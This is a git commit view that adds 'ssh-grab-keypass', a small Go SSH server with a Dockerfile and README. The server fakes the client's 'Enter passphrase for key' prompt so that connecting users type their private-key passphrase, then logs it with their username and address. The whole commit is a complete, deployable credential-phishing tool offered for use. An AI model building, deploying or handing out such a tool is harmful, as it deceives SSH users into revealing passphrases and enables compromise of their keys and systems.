about summary refs log tree commit diff
diff options
context:
space:
mode:
authormaride <maride@darknebu.la>2019-02-12 14:40:46 +0100
committermaride <maride@darknebu.la>2019-02-12 14:40:46 +0100
commit34e0f86d7eea9ed9cb891d20d0de63ce7e79dc0a (patch)
treecd682c605fc4f532d5c775ec2baf966620370632
Init
-rw-r--r--Dockerfile19
-rw-r--r--README.md7
-rw-r--r--main.go50
3 files changed, 76 insertions, 0 deletions
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..cdb8930
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,19 @@
+FROM golang:1.10-alpine
+
+# Setup
+COPY main.go .
+
+# Install libs
+RUN apk add git
+RUN go get github.com/gliderlabs/ssh
+
+# Build
+RUN go build -o ssh-grab-keypass
+
+# Drop privs
+RUN adduser -u 1337 -D jail
+RUN chmod 000 /home/jail
+
+EXPOSE 2222
+
+CMD su -c ./ssh-grab-keypass jail
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..2afed8a
--- /dev/null
+++ b/README.md
@@ -0,0 +1,7 @@
+# ssh-grab-keypass
+
+Try to grab passphrases for SSH keyfiles by simulating the pubkey-prompt by the client - on the server side.
+
+## Usage
+
+Simply run it. The executable takes no command line arguments
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..b2b2ae4
--- /dev/null
+++ b/main.go
@@ -0,0 +1,50 @@
+package main
+
+import (
+    "fmt"
+    "github.com/gliderlabs/ssh"
+    "log"
+    "strings"
+)
+
+func main() {
+    ssh.Handle(handleConnection)
+    listenErr := ssh.ListenAndServe(":2222", nil)
+
+    if listenErr != nil {
+        log.Fatalln(listenErr.Error())
+    }
+}
+
+func handleConnection(s ssh.Session) {
+    // Set up buffer
+    buf := make([]byte, 1)
+
+    // Send our message
+    fmt.Fprintf(s, "Enter passphrase for key '/home/%s/.ssh/id_rsa': ", s.User())
+
+    // Read id_rsa password of our client ;)
+    var readErr error
+    strBuf := ""
+
+    for readErr == nil && !strings.Contains(strBuf, "\x0D") {
+        _, readErr = s.Read(buf)
+
+        if string(buf[0]) != "\x0D" {
+            strBuf += string(buf[0])
+        } else {
+            break
+        }
+    }
+
+    if readErr == nil {
+        // Print out pass
+        log.Printf("%s@%s: '%s'", s.User(), s.RemoteAddr().String(), strBuf)
+    } else {
+        // Read error - just log that.
+        log.Println(readErr.Error())
+    }
+
+    // And close it.
+    s.Exit(1)
+}